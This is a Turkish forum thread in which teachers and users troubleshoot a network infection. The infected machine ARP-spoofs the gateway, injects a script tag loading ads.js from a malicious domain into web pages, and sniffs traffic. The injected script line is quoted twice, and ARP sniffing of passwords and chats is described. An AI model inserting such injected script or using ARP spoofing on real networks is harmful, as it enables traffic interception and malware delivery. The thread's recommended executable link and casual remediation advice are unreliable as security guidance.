- Mesajlar
- 13,082
http://u.asdafdgfgf.com/ads.js trojanı buluşmış.Nasıl temizleneceği konusunda bize yardımcı olacak birileri varmı?
şimdiden teşekkürler.
şimdiden teşekkürler.
http://u.asdafdgfgf.com/ads.js trojanı
- Konbuyu başlatan hasari
- Başlangıç tarihi
hasari' Alıntı:
ingilizce olarak gözünüzü korkutmayın. Türkçe kaynaklarıda araştırabiliriz. Sitede AVG antivirüs forumlarına link verilmiş çözüm için ayrıca aşağılara doğru indiğinizde arprotect programına link verilmiş onun kullanılmasını öneriyor. Yani ingilizce diyerek gözünüz korkmasın bilgisayar terimi olarak inceleyin zaten yakalayacağınız pek çok şey olduğunu farkedeceksiniz. Kolay gelsin....
Not : Antivirüsünüz güncelmi? Genelde antivirüslerin temizlediğindende bahsediliyor. olmazsa güvenli kipte açarak güncel bir antivirüsle tarama yapınız.
- Mesajlar
- 13,082
NETTE ŞUNU BULDUM BİR ARKADAŞ AÇIKLAMIŞ AMA...
virus
merhaba arkadaslar,
son bir kac aydır üniversitemizin tüm network'ünü duman eden bir virüs ile başımız dertte idi. antivirus programları bazı web sitelerine bağlanırken virüs bulundu (ANI.GEN , Trojan Downloader, Alman/NAB vs. gibi) uyarısı veriyor ancak pc'yi tarattığımızda hiç bir virüse rastlanmıyordu. işin ilginç yanı bir çok web sitesine bağlanırken html sayfasının kaynağını görüntüle dediğimizde aşağıdaki script kodunun eklendiğini gördük.
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>
bir web sitesindeki (bazen bu adres 222360.com da olabiliyor) javascript dosyasını açmaya çalışıyordu virüs. ama işin ilginç olan yanı bilgisayarda virüs olmadığına emin olmamıza rağmen zaman zaman üstteki kodun girilen tüm sayfalarda çıkması idi. bu durumda bir kaç ihtimal kalıyordu. ağdaki trafiğe bir şekilde müdahale eden bir virüs söz konusu olmalıydı. virüs sadece yukardaki kodu girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyordu. internette forumlarda defalarca bu konuyu aradık, pek çok kişi aynı dertten muzdarip idi ancak bir çözüm yoktu. geçenlerde hindistan menşeili bir servis sağlayıcının benzer bir problemden dolayı müşterilerine sunduğu çözüme ulaştım. virüsün olayı şu idi:
-arp spoofing (arp poisoning) adı verilen teknik ile switch tabanlı bir ağda kendisini gateway/router gibi tanıtıyordu
-böylece siz bir web sitesine bağlanmaya çalışınca gateway olarak virüslü bilgisayara bağlanıyordunuz
-o bilgisayarda ilgili web sitesini size gösterirken kendi kodunuda sayfanın en üstüne enjekte ediyordu
-tabi sizin tüm internet trafiğiniz virüslü o bilgisayar tarafından süzülüyordu bu da tüm şifre ve yazışmalarında süzüldüğü anlamına geliyor
çözüm ise basit: ağda gerçekten virüslü olan makineleri tespit edip virüslerini temizlemek. ancak üniversite gibi 1000lerce bilgisayarın buluduğu ve bir kontrolün olmadığı ortamlarda bunu yapmak pek pratik değil. ama hindu amcalar ufak bir yazılım ile ağda arp spoofing yapan makinelerin iplerini tespit edebilmişler.
3-4 gündür bilgisayarımda bu yazılımı çalıştırarak virüslü bilgisayarları tespit etmeye çalışıyorum. bir bilgisayarı yakaladık ve virüsünü temizledik. şimdilik problemler azaldı ancak tamamen düzelmesi zaman alacak gibi görünüyor. virüsten muzdarip olanlara allah kolaylık versin diyorum.
bu arada bu virüsle ilgilenirken arp spoofing olayını da inceledim. bu yöntemle ağdaki trafiği dinlemeniz (sniffing) mümkün. bağlanılan web sitelerini, ağdaki msn konuşmalarını hatta msn web cam görüntülerini yakalamak için onlarca yazılım olduğunu gördüm. ama bu iş çok sakat. her dakika ağda arp spoofing yapan varmı diye bakamayız ki? mahremiyet diye bişey kalmamış oluyor. bence antivirüs yazılımlarına bu özellik eklenmeli, ağda spoofing yapan makineleri tespit etmeli ve ona göre önlem almalı.
ALINTIDIR
virus
merhaba arkadaslar,
son bir kac aydır üniversitemizin tüm network'ünü duman eden bir virüs ile başımız dertte idi. antivirus programları bazı web sitelerine bağlanırken virüs bulundu (ANI.GEN , Trojan Downloader, Alman/NAB vs. gibi) uyarısı veriyor ancak pc'yi tarattığımızda hiç bir virüse rastlanmıyordu. işin ilginç yanı bir çok web sitesine bağlanırken html sayfasının kaynağını görüntüle dediğimizde aşağıdaki script kodunun eklendiğini gördük.
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>
bir web sitesindeki (bazen bu adres 222360.com da olabiliyor) javascript dosyasını açmaya çalışıyordu virüs. ama işin ilginç olan yanı bilgisayarda virüs olmadığına emin olmamıza rağmen zaman zaman üstteki kodun girilen tüm sayfalarda çıkması idi. bu durumda bir kaç ihtimal kalıyordu. ağdaki trafiğe bir şekilde müdahale eden bir virüs söz konusu olmalıydı. virüs sadece yukardaki kodu girilen tüm sayfalara enjekte etmekle kalmıyor, ağda müthiş bir trafik oluşturuyor, internet bağlantısını yavaşlatıyor hatta çoğu zaman iptal ediyordu. internette forumlarda defalarca bu konuyu aradık, pek çok kişi aynı dertten muzdarip idi ancak bir çözüm yoktu. geçenlerde hindistan menşeili bir servis sağlayıcının benzer bir problemden dolayı müşterilerine sunduğu çözüme ulaştım. virüsün olayı şu idi:
-arp spoofing (arp poisoning) adı verilen teknik ile switch tabanlı bir ağda kendisini gateway/router gibi tanıtıyordu
-böylece siz bir web sitesine bağlanmaya çalışınca gateway olarak virüslü bilgisayara bağlanıyordunuz
-o bilgisayarda ilgili web sitesini size gösterirken kendi kodunuda sayfanın en üstüne enjekte ediyordu
-tabi sizin tüm internet trafiğiniz virüslü o bilgisayar tarafından süzülüyordu bu da tüm şifre ve yazışmalarında süzüldüğü anlamına geliyor
çözüm ise basit: ağda gerçekten virüslü olan makineleri tespit edip virüslerini temizlemek. ancak üniversite gibi 1000lerce bilgisayarın buluduğu ve bir kontrolün olmadığı ortamlarda bunu yapmak pek pratik değil. ama hindu amcalar ufak bir yazılım ile ağda arp spoofing yapan makinelerin iplerini tespit edebilmişler.
3-4 gündür bilgisayarımda bu yazılımı çalıştırarak virüslü bilgisayarları tespit etmeye çalışıyorum. bir bilgisayarı yakaladık ve virüsünü temizledik. şimdilik problemler azaldı ancak tamamen düzelmesi zaman alacak gibi görünüyor. virüsten muzdarip olanlara allah kolaylık versin diyorum.
bu arada bu virüsle ilgilenirken arp spoofing olayını da inceledim. bu yöntemle ağdaki trafiği dinlemeniz (sniffing) mümkün. bağlanılan web sitelerini, ağdaki msn konuşmalarını hatta msn web cam görüntülerini yakalamak için onlarca yazılım olduğunu gördüm. ama bu iş çok sakat. her dakika ağda arp spoofing yapan varmı diye bakamayız ki? mahremiyet diye bişey kalmamış oluyor. bence antivirüs yazılımlarına bu özellik eklenmeli, ağda spoofing yapan makineleri tespit etmeli ve ona göre önlem almalı.
ALINTIDIR
okur_musun
Site Gezgini
- Mesajlar
- 68
http://www.netoptima.in/ARProtect_Setup_0.12.27.exe yi yükledim, bulunamadı birşey diyor ama bilemiyorum artık, yarın tekrar okula gidince bakarım avast ve kaspersky aynı uyarıyı verecekmi, idare bilgisayarlarında oluyor da bu uyarı.
- Mesajlar
- 13,082
Hocam programı çalıştırdıktan sonra biraz bekleyin size virüslü makinanın IP sini verecek sonra ağda o makinayı bularak ordaki makinaya ya format atın yada ağdan çıkarın bugün gün boyunca uğraştım en sonunda virüsten kurtuldum. Önce virüslü makinayı tespit ettim sonra format attım ver virüsten ebediyeten kurtuldum. Diğer bilgisayarlarda görünen virüsler bir anda yok oldu.....Yapamazsanız yazın yardımcı olayım.
okur_musun
Site Gezgini
- Mesajlar
- 68
hasari hocam teşekkürler. Okul çıkışında kurdum programı iki idareci pc ye, 1 dakika bekledim sanırım 
Bulunamadı deyince, işim de vardı, çıktım okuldan. Yarın gidince bakarım bi. Sonucu yazarım buraya...
Bulunamadı deyince, işim de vardı, çıktım okuldan. Yarın gidince bakarım bi. Sonucu yazarım buraya...
- Mesajlar
- 13,082
Dün çözmeseydim idareciler kafamın etini yerlerdi neyseki bu dertten kurtuldum ben. müdürden tebrik bile aldık...okur_musun' Alıntı:hasari hocam teşekkürler. Okul çıkışında kurdum programı iki idareci pc ye, 1 dakika bekledim sanırım
okur_musun
Site Gezgini
- Mesajlar
- 68
2 ip buldu. Ama benim yine zamanım olmadı Başka öğretmenlerin de dersi vardı, hangi bilgisayarlar olduğuna bakamadım, 40 dan fazla pc var okulda ve bundan başka sorunlar çıktı bilgisayarlarda. 3 okula gidiyorum, her okulda ayrı bir sorun, virüslerle uğraşmak canımı sıktı artık yaa
Başka öğretmenlerin de dersi vardı, hangi bilgisayarlar olduğuna bakamadım, 40 dan fazla pc var okulda ve bundan başka sorunlar çıktı bilgisayarlarda. 3 okula gidiyorum, her okulda ayrı bir sorun, virüslerle uğraşmak canımı sıktı artık yaa bariskarabay
Aktif Üye
- Mesajlar
- 111
bnm de öyle sorunum vardı antivir saolsun buldu hemen :idea:
- Mesajlar
- 13,082
Hocam zor olmalı üç okulla uğraşmak bu arada sanırım formatörsünüz...Kolay gelsin diyim ne diyeyimki ben bir okulla zor uğraşıyorumokur_musun' Alıntı:2 ip buldu. Ama benim yine zamanım olmadı
okur_musun
Site Gezgini
- Mesajlar
- 68
Keşke formatör olsam
Sanırım sadece kendi okulumla uğraşsam daha iyi olacak, yoksa yetişemiyorum, pek bişey de yaptığım yok ama, çok zaman alıyor ya, bir de zaten derse gir çık. Arada bu siteden yardım alıyorum iyi oluyorevet bu sorun 1 haftadır benide meşgul ediyordu bu sitede bir arkadaş bu konuyu masaya yatırmış ordaki yazıyla çözdüm bende
http://blog.talha.org/?p=9
http://blog.talha.org/?p=9
Maviaycafe
Üye
- Mesajlar
- 4
selam Aleykum aynı vurusu Suan Bende yasiyorum tavsiye ettiginiz programi kurdum ilki pc de oldugunu gördum onlara formati atttim bu aralar modemde gözukuyor ne yapmaliyim yardim edermisiniz
- Mesajlar
- 13,082
Hocam modemde değildir.Oraya yerleşmesi mümkündeğil sanırım yanlış makinaya format atmışsınız diğer makinaları kontrol edin muhtemelen onlardan birinde vardır. Ona format atın kurtulun. Bu arada kendi modeminizi kapatıp 10 sn kadar bekledikten sonra tekrar açın faydalı olacaktır. Kolaygelsin.Maviaycafe' Alıntı:
- Mesajlar
- 13,082
Hocam o format atana kadar başınıza bela olacağı kesin eğer baktınız olacak gibi değil onun ağ kablosunu çekin. Sizde bu dertten kurtulun. Format atıncada tekrar kabloyu takın, kaldığınız yerden devam edin. kolay gelsin size bir problem çıkarsa yazın yardımcı olmaya çalışalım.deli_divane' Alıntı:
- Mesajlar
- 13,082
Hocam düşünceniz güzel fakat; bende ovirüsle uğraştığım için kendini modeme atmadığını biliyorum. Ama tabiki onu yapıcak virüslerde olabilir. Böyle bir yürüsü yazıcak kişiler belli bir marka seçicekler ve ona savaş açıcaklar onu pek kimse yapmaz bu şirkete savaş açmak gibi birşeydir.Tabi bunun yanında şirket öylece durur mu durmaz tabiki. şirketinde eli armut toplamıyorya onlarda alırlar güvenlik önlemini ki! var zaten güvvenlik önlemleri fakat; deneyimsiz kullanıcılar bunu bilmiyor. Hocam bu konuda rahat olun siz bilgisayarınızdan hallediverin virüs işini.sitelerde' Alıntı:
Maviaycafe
Üye
- Mesajlar
- 4
aynısını Uyguladim format attigim pc lere tekrar gösteriyor vurus var diye bu programdan Hic Bisi Anlamadim Ama Rezil Oldugum Ap Acik ortada
- Mesajlar
- 13,082
Hocam hiç endişe etmeyin şu linkten programı indirip kurun http://www.netoptima.in/ARProtect_Setup_0.12.27.exeMaviaycafe' Alıntı:
kurduktan sonra çalıştırın 2 dk bekleyin size IP adresi vericek onu not edin ve ardından ilgili makinayı bulun(Makineyı bulmanız kolaylaştı çünkü elinizde artık IP adresi var) bulduktan sonra güzelce formatınızı o makinaya atın bu dertten kurtulun.Hadi kolay gelsin yapamazsanız yazın yardımcı olmaya çalışalım.